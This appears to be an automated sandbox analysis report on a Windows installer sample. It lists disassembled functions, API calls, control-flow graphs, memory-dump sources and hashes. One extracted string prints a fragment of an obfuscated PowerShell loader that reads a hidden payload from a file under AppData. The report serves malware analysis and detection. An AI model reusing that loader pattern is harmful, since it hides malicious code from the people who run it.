                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040544A
                                                            • OpenClipboard.USER32(00000000), ref: 0040545A
                                                            • EmptyClipboard.USER32 ref: 00405460
                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040546C
                                                            • GlobalLock.KERNEL32(00000000), ref: 00405476
                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040548A
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004054AA
                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004054B5
                                                            • CloseClipboard.USER32 ref: 004054BB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                            • String ID: {$QM
                                                            • API String ID: 590372296-1725967926
                                                            • Opcode ID: 6a257b260a3b0c83269dcddb951c3defeee43ec038cce651daa15833628ad7d2
                                                            • Instruction ID: 772e8fb2bc22c5523386e43e2fe12f7b772d85fac993704a731418f1505fe185
                                                            • Opcode Fuzzy Hash: 6a257b260a3b0c83269dcddb951c3defeee43ec038cce651daa15833628ad7d2
                                                            • Instruction Fuzzy Hash: A8A14871800609FFDB119F60DD89AAE7B79FF08355F00403AFA45BA1A0CBB59A51DF58
                                                            Function 00405D68 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 409 405d68-405d73 410 405d75-405d84 409->410 411 405d86-405d9c 409->411 410->411 412 405da2-405daf 411->412 413 405fb4-405fba 411->413 412->413 414 405db5-405dbc 412->414 415 405fc0-405fcb 413->415 416 405dc1-405dce 413->416 414->413 418 405fd6-405fd7 415->418 419 405fcd-405fd1 call 405d46 415->419 416->415 417 405dd4-405de0 416->417 421 405fa1 417->421 422 405de6-405e22 417->422 419->418 423 405fa3-405fad 421->423 424 405faf-405fb2 421->424 425 405f42-405f46 422->425 426 405e28-405e33 GetVersion 422->426 423->413 424->413 429 405f48-405f4c 425->429 430 405f7b-405f7f 425->430 427 405e35-405e39 426->427 428 405e4d 426->428 427->428 434 405e3b-405e3f 427->434 431 405e54-405e5b 428->431 435 405f5c-405f69 call 405d46 429->435 436 405f4e-405f5a call 405c8d 429->436 432 405f81-405f89 call 405d68 430->432 433 405f8e-405f9f lstrlenW 430->433 438 405e60-405e62 431->438 439 405e5d-405e5f 431->439 432->433 433->413 434->428 442 405e41-405e45 434->442 446 405f6e-405f77 435->446 436->446 444 405e64-405e81 call 405c13 438->444 445 405e9e-405ea1 438->445 439->438 442->428 447 405e47-405e4b 442->447 452 405e86-405e8a 444->452 450 405eb1-405eb4 445->450 451 405ea3-405eaf GetSystemDirectoryW 445->451 446->433 449 405f79 446->449 447->431 453 405f3a-405f40 call 405fda 449->453 455 405eb6-405ec4 GetWindowsDirectoryW 450->455 456 405f1f-405f21 450->456 454 405f23-405f27 451->454 457 405e90-405e99 call 405d68 452->457 458 405f29-405f2d 452->458 453->433 454->453 454->458 455->456 456->454 459 405ec6-405ed0 456->459 457->454 458->453 462 405f2f-405f35 lstrcatW 458->462 464 405ed2-405ed5 459->464 465 405eea-405f00 SHGetSpecialFolderLocation 459->465 462->453 464->465 466 405ed7-405ede 464->466 467 405f02-405f19 SHGetPathFromIDListW CoTaskMemFree 465->467 468 405f1b 465->468 470 405ee6-405ee8 466->470 467->454 467->468 468->456 470->454 470->465
                                                            APIs
                                                            • GetVersion.KERNEL32(00000000,Frisurens,?,00405031,Frisurens,00000000,00000000,0041C0DD), ref: 00405E2B
                                                            • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00405EA9
                                                            • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 00405EBC
                                                            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405EF8
                                                            • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00405F06
                                                            • CoTaskMemFree.OLE32(?), ref: 00405F11
                                                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F35
                                                            • lstrlenW.KERNEL32(: Completed,00000000,Frisurens,?,00405031,Frisurens,00000000,00000000,0041C0DD), ref: 00405F8F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                            • String ID: "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(286$: Completed$Frisurens$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                            • API String ID: 900638850-645379208
                                                            • Opcode ID: 22fe4a5b293e7964b16035e555f953c0a2e3a01ea996a2207c843cdd348733b1
                                                            • Instruction ID: b81ff5d6b4e7f68ebbf9f5a60334f295c7cfdbca171d810927ba552bda20cf23
                                                            • Opcode Fuzzy Hash: 22fe4a5b293e7964b16035e555f953c0a2e3a01ea996a2207c843cdd348733b1
                                                            • Instruction Fuzzy Hash: E761C071A00906ABDF209F25CD45AAF37A5EF55314F14803BE585BA2E0D77D8A82CF8D
                                                            Function 004055D5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 471 4055d5-4055fb call 4058b6 474 405614-40561b 471->474 475 4055fd-40560f DeleteFileW 471->475 477 40561d-40561f 474->477 478 40562e-40563e call 405d46 474->478 476 4057a7-4057ab 475->476 479 405755-40575a 477->479 480 405625-405628 477->480 486 405640-40564b lstrcatW 478->486 487 40564d-40564e call 4057fa 478->487 479->476 482 40575c-40575f 479->482 480->478 480->479 484 405761-405767 482->484 485 405769-405771 call 406089 482->485 484->476 485->476 494 405773-405787 call 4057ae call 40558d 485->494 489 405653-405657 486->489 487->489 492 405663-405669 lstrcatW 489->492 493 405659-405661 489->493 495 40566e-40568b lstrlenW FindFirstFileW 492->495 493->492 493->495 510 405789-40578c 494->510 511 40579f-4057a2 call 404ffa 494->511 496 405691-4056aa call 4057db 495->496 497 40574a-40574e 495->497 504 4056b5-4056b9 496->504 505 4056ac-4056b0 496->505 497->479 501 405750 497->501 501->479 508 4056d0-4056de call 405d46 504->508 509 4056bb-4056c2 504->509 505->504 507 4056b2 505->507 507->504 521 4056e0-4056e8 508->521 522 4056f5-405700 call 40558d 508->522 513 4056c4-4056c8 509->513 514 405729-40573b FindNextFileW 509->514 510->484 516 40578e-40579d call 404ffa call 405be0 510->516 511->476 513->508 517 4056ca-4056ce 513->517 514->496 519 405741-405744 FindClose 514->519 516->476 517->508 517->514 519->497 521->514 525 4056ea-4056f3 call 4055d5 521->525 530 405721-405724 call 404ffa 522->530 531 405702-405705 522->531 525->514 530->514 533 405707-405717 call 404ffa call 405be0 531->533 534 405719-40571f 531->534 533->514 534->514
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\YrCSUX2O3I.exe"), ref: 004055FE
                                                            • lstrcatW.KERNEL32(0042F200,\*.*,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\YrCSUX2O3I.exe"), ref: 00405646
                                                            • lstrcatW.KERNEL32(?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\YrCSUX2O3I.exe"), ref: 00405669
                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\YrCSUX2O3I.exe"), ref: 0040566F
                                                            • FindFirstFileW.KERNEL32(0042F200,?,?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\YrCSUX2O3I.exe"), ref: 0040567F
                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,?,?,0000003F), ref: 00405733
                                                            • FindClose.KERNEL32(00000000), ref: 00405744
                                                            Strings
                                                            • "C:\Users\user\Desktop\YrCSUX2O3I.exe", xrefs: 004055DE
                                                            • \*.*, xrefs: 00405640
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004055E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                            • String ID: "C:\Users\user\Desktop\YrCSUX2O3I.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                            • API String ID: 2035342205-1418626317
                                                            • Opcode ID: 47c12af7b891abb2e5cafb38bce86d44a40b8918cc5e8908534289e066a9b85e
                                                            • Instruction ID: 4fa580f458b6ccb0767a7c3d42ea348ba32fb6fd56c90456328cf5468defc57c
                                                            • Opcode Fuzzy Hash: 47c12af7b891abb2e5cafb38bce86d44a40b8918cc5e8908534289e066a9b85e
                                                            • Instruction Fuzzy Hash: 8A51B135800A05EACB21AB218C85ABF7778EF81754F54843BF415B61D1E77C4982EE6D
                                                            Function 004060B0 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                            • LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                            • String ID:
                                                            • API String ID: 310444273-0
                                                            • Opcode ID: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
                                                            • Instruction ID: 8a2f4544d0f7460eb2636e635d5deeba11c8ac6a6071c480d08d1599e38ef1a2
                                                            • Opcode Fuzzy Hash: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
                                                            • Instruction Fuzzy Hash: C3E0CD326002309BC3204B30AE4497773EC9F98640305043EF645F6000CB74DC22EF69
                                                            Function 00406089 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,00430248,0042FA00,004058FF,0042FA00,0042FA00,00000000,0042FA00,0042FA00,?,?,76F93420,004055F5,?,C:\Users\user\AppData\Local\Temp\,76F93420), ref: 00406094
                                                            • FindClose.KERNELBASE(00000000), ref: 004060A0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
                                                            • Instruction ID: 8c9aebf9a212da5294cb1f82767a4f5960c49382cb163a998aea3b369420c93e
                                                            • Opcode Fuzzy Hash: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
                                                            • Instruction Fuzzy Hash: B2D012716585209BC7905738AE0C84B7A98AF593717224B36F46BF22E0CB3C8C66869C
                                                            Function 00403ABD Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 168 403abd-403acf 169 403c10-403c1f 168->169 170 403ad5-403adb 168->170 172 403c21-403c69 GetDlgItem * 2 call 403f95 SetClassLongW call 40140b 169->172 173 403c6e-403c83 169->173 170->169 171 403ae1-403aea 170->171 174 403aec-403af9 SetWindowPos 171->174 175 403aff-403b02 171->175 172->173 177 403cc3-403cc8 call 403fe1 173->177 178 403c85-403c88 173->178 174->175 180 403b04-403b16 ShowWindow 175->180 181 403b1c-403b22 175->181 187 403ccd-403ce8 177->187 183 403c8a-403c95 call 401389 178->183 184 403cbb-403cbd 178->184 180->181 188 403b24-403b39 DestroyWindow 181->188 189 403b3e-403b41 181->189 183->184 199 403c97-403cb6 SendMessageW 183->199 184->177 186 403f62 184->186 194 403f64-403f6b 186->194 192 403cf1-403cf7 187->192 193 403cea-403cec call 40140b 187->193 195 403f3f-403f45 188->195 197 403b43-403b4f SetWindowLongW 189->197 198 403b54-403b5a 189->198 202 403f20-403f39 DestroyWindow EndDialog 192->202 203 403cfd-403d08 192->203 193->192 195->186 200 403f47-403f4d 195->200 197->194 204 403b60-403b71 GetDlgItem 198->204 205 403bfd-403c0b call 403ffc 198->205 199->194 200->186 209 403f4f-403f58 ShowWindow 200->209 202->195 203->202 210 403d0e-403d5b call 405d68 call 403f95 * 3 GetDlgItem 203->210 206 403b90-403b93 204->206 207 403b73-403b8a SendMessageW IsWindowEnabled 204->207 205->194 211 403b95-403b96 206->211 212 403b98-403b9b 206->212 207->186 207->206 209->186 238 403d65-403da1 ShowWindow KiUserCallbackDispatcher call 403fb7 EnableWindow 210->238 239 403d5d-403d62 210->239 215 403bc6-403bcb call 403f6e 211->215 216 403ba9-403bae 212->216 217 403b9d-403ba3 212->217 215->205 219 403be4-403bf7 SendMessageW 216->219 221 403bb0-403bb6 216->221 217->219 220 403ba5-403ba7 217->220 219->205 220->215 224 403bb8-403bbe call 40140b 221->224 225 403bcd-403bd6 call 40140b 221->225 236 403bc4 224->236 225->205 234 403bd8-403be2 225->234 234->236 236->215 242 403da3-403da4 238->242 243 403da6 238->243 239->238 244 403da8-403dd6 GetSystemMenu EnableMenuItem SendMessageW 242->244 243->244 245 403dd8-403de9 SendMessageW 244->245 246 403deb 244->246 247 403df1-403e2f call 403fca call 405d46 lstrlenW call 405d68 SetWindowTextW call 401389 245->247 246->247 247->187 256 403e35-403e37 247->256 256->187 257 403e3d-403e41 256->257 258 403e60-403e74 DestroyWindow 257->258 259 403e43-403e49 257->259 258->195 261 403e7a-403ea7 CreateDialogParamW 258->261 259->186 260 403e4f-403e55 259->260 260->187 262 403e5b 260->262 261->195 263 403ead-403f04 call 403f95 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 261->263 262->186 263->186 268 403f06-403f19 ShowWindow call 403fe1 263->268 270 403f1e 268->270 270->195
                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403AF9
                                                            • ShowWindow.USER32(?), ref: 00403B16
                                                            • DestroyWindow.USER32 ref: 00403B2A
                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403B46
                                                            • GetDlgItem.USER32(?,?), ref: 00403B67
                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403B7B
                                                            • IsWindowEnabled.USER32(00000000), ref: 00403B82
                                                            • GetDlgItem.USER32(?,00000001), ref: 00403C30
                                                            • GetDlgItem.USER32(?,00000002), ref: 00403C3A
                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403C54
                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403CA5
                                                            • GetDlgItem.USER32(?,00000003), ref: 00403D4B
                                                            • ShowWindow.USER32(00000000,?), ref: 00403D6C
                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D7E
                                                            • EnableWindow.USER32(?,?), ref: 00403D99
                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DAF
                                                            • EnableMenuItem.USER32(00000000), ref: 00403DB6
                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403DCE
                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403DE1
                                                            • lstrlenW.KERNEL32(0042D1F8,?,0042D1F8,00433EA0), ref: 00403E0A
                                                            • SetWindowTextW.USER32(?,0042D1F8), ref: 00403E1E
                                                            • ShowWindow.USER32(?,0000000A), ref: 00403F52
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                            • String ID: QM
                                                            • API String ID: 3282139019-1341965732
                                                            • Opcode ID: 8e1e93e696dc9d9bf908262f32253b95ed2efac643936c27f45201f4937cad5a
                                                            • Instruction ID: 9063085a3fd87244c99a969d1f6d2bb761e88773988a4a67d8464f71257f90be
                                                            • Opcode Fuzzy Hash: 8e1e93e696dc9d9bf908262f32253b95ed2efac643936c27f45201f4937cad5a
                                                            • Instruction Fuzzy Hash: 7BC1CD71900305BFDB216F65EE8AE2A3E7CFB4970AB14043EF641B11E1CB7999429B1D
                                                            Function 0040371A Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 271 40371a-403732 call 4060b0 274 403734-403744 call 405c8d 271->274 275 403746-40377d call 405c13 271->275 282 4037a0-4037c9 call 4039f0 call 4058b6 274->282 280 403795-40379b lstrcatW 275->280 281 40377f-403790 call 405c13 275->281 280->282 281->280 289 40385b-403863 call 4058b6 282->289 290 4037cf-4037d4 282->290 296 403871-403896 LoadImageW 289->296 297 403865-40386c call 405d68 289->297 290->289 291 4037da-403802 call 405c13 290->291 291->289 298 403804-403808 291->298 300 403917-40391f call 40140b 296->300 301 403898-4038c8 RegisterClassW 296->301 297->296 303 40381a-403826 lstrlenW 298->303 304 40380a-403817 call 4057db 298->304 313 403921-403924 300->313 314 403929-403934 call 4039f0 300->314 305 4039e6 301->305 306 4038ce-403912 SystemParametersInfoW CreateWindowExW 301->306 310 403828-403836 lstrcmpiW 303->310 311 40384e-403856 call 4057ae call 405d46 303->311 304->303 308 4039e8-4039ef 305->308 306->300 310->311 312 403838-403842 GetFileAttributesW 310->312 311->289 317 403844-403846 312->317 318 403848-403849 call 4057fa 312->318 313->308 324 40393a-403957 ShowWindow LoadLibraryW 314->324 325 4039bd-4039be call 4050cd 314->325 317->311 317->318 318->311 327 403960-403972 GetClassInfoW 324->327 328 403959-40395e LoadLibraryW 324->328 329 4039c3-4039c5 325->329 330 403974-403984 GetClassInfoW RegisterClassW 327->330 331 40398a-4039ad DialogBoxParamW call 40140b 327->331 328->327 332 4039c7-4039cd 329->332 333 4039df-4039e1 call 40140b 329->333 330->331 337 4039b2-4039bb call 40366a 331->337 332->313 335 4039d3-4039da call 40140b 332->335 333->305 335->313 337->308
                                                            APIs
                                                              • Part of subcall function 004060B0: GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                              • Part of subcall function 004060B0: LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                              • Part of subcall function 004060B0: GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
